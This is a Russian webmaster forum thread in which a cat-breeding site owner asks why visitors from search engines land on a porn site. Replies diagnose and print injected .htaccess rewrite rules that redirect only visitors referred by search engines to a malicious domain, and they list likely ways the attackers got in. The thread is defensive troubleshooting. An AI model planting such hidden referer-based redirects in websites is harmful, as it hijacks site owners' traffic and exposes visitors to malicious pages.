Как избавиться от сисек и пиписек? Выдача поисковиков выдает вместо сайта порнуху

V9
На сайте с 02.02.2007
Offline
39
2090

Есть сайт http://hathorcat.com/, достаточно простой, ничего особенного, тематика - ориентальные

кошки. До последнего времени все с ним было нормально. Сайт хорошо стоял по тематическому запросу "ориентальные кошки" - в яндексе, гугле и других на первой странице.

На днях хозяйка сайта заметила, что в поисковой выдаче яндекса после ее сайта написано

"Этот сайт может нанести вред Вашему компьютеру". При попытке перейти на свой сайт с выдачи яндекса она увидела порно-сайт, куча сисек и пиписек, и никаких кошек, кошмар какой-то. То же самое в гугле и рамблере, другие я не стал проверять. А если зайти на сайт просто по адресу, набрать в адресной строке http://hathorcat.com/, то видим нормальный сайт, никакой порнухи.

Понятно, что тут поработали какие-то хакеры. Фишка в том, что непонятно, как переходит

перенаправление. HTML-тексты сайта я проверял, там ничего подозрительного нет. Желающие могут проверить сами. И тексты не изменялись в течение долгого времени, а порнушка появилась недавно.

Позвонили хостеру - nic.ru - они сказали, что проверили и у них все в порядке. Пишите типа в яндекс. Написали - эффект наступил интересный - на другой день сайт вообще исчез из выдачи, даже по прямому запросу "hathorcat". Ответ на письмо пока не пришел, яндекс с ответами никогда не торопится. В Гугле и Рамблере все по-старому, желающие могут проверить и полюбоваться на порнушку. Фотки качественные. :)

Вопрос такой - что это может быть и как с этим бороться? Трясти хостера? Все-таки это его вина или чья? Не может же быть, что хакнули выдачу сразу трех или более поисковиков? Логичнее предположить, что хакнули хостера и каким-то образом подменяют то, что хостер отдает поисковым роботам. Пожалуйста, помогите советом.

X
На сайте с 09.11.2006
Offline
132
#1

У меня такое было, переход на порно только из выдачи яндекса. Причина была в .htaccess, туда редирект впихнули. Яндекс автоматом удаляет страницы из выдачи, с которых поставлен редирект. Мо сайт не удалили, может не успели. Зато пришло уведомление о проблеме, о том, что теперь сайт выводится с предупреждением, но это потому, что сайт зарегистрирован в вебмастере яндексовом. Наверное тогда до меня просто не успел добраться робот индексатор

xtumen добавил 02.08.2009 в 20:18

/** .htaccess **/
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteRule .* httр://vredonosnyj-sajt.net.ru/ [R,L]

http://webmaster.ya.ru/replies.xml?item_no=4347&ncrnd=9067

V9
На сайте с 02.02.2007
Offline
39
#2

Спасибо, я понял.

Все так и есть, в файле htaccess нашел вот что:

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]

RewriteRule .* ************************ [R,L]

А я даже и не знал, что такой файл существует. А как хакеры туда залезли? Через ftp-доступ или можно как-то еще?

S2
На сайте с 07.01.2008
Offline
611
#3
Vlad97:
Через ftp-доступ или можно как-то еще?

Если в движке уязвимость нашли, то могли и напрямую. Можно через фтп, иногда через админку. Мог у вас с компа троян пароль утащить к фтп.

Не надо приписывать мне свои выводы, я имею ввиду только то, что написал. Лучшая партнёрка по футболкам/толстовкам (http://partnerka.kolorado.ru/?ref=1921540) Опрос: Проверить текст на уник - как? (/ru/forum/495885)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий